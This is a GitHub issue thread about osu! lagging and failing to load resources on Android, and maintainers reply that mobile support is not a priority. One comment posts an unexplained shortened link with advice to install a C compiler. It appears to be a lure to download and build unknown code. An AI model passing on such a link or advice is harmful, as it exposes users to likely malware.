### ISSUE TITLE
BUG HEAVILY

### ISSUE THREAD

**Issue by LossBG** [ppy/osu#29931]
### Type

Game behaviour

### Bug description

When open my game,OSU get lag heavily and not fully loaded the game resources and the gameplay also!Some of The front is not loaded.And in gameplay,most of the slider get invisible.You can view it at the video

### Screenshots or videos

https://github.com/user-attachments/assets/7109e573-40ca-47f3-8720-67dcc5599592

### Version

2024.906.2

### Logs

[logs.zip](https://github.com/user-attachments/files/17058079/logs.zip)

**Comment by AaryanMadal** [comment]
I think this will help you.
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by smoogipoo** [comment]
This falls under the many other Android-related issues: https://github.com/ppy/osu/issues/25189

It'll improve at some point in the future...

**Comment by LossBG** [comment]
So will it fix soon?

**Comment by bdach** [comment]
Mobile support is not an imminent priority. Desktop comes first.
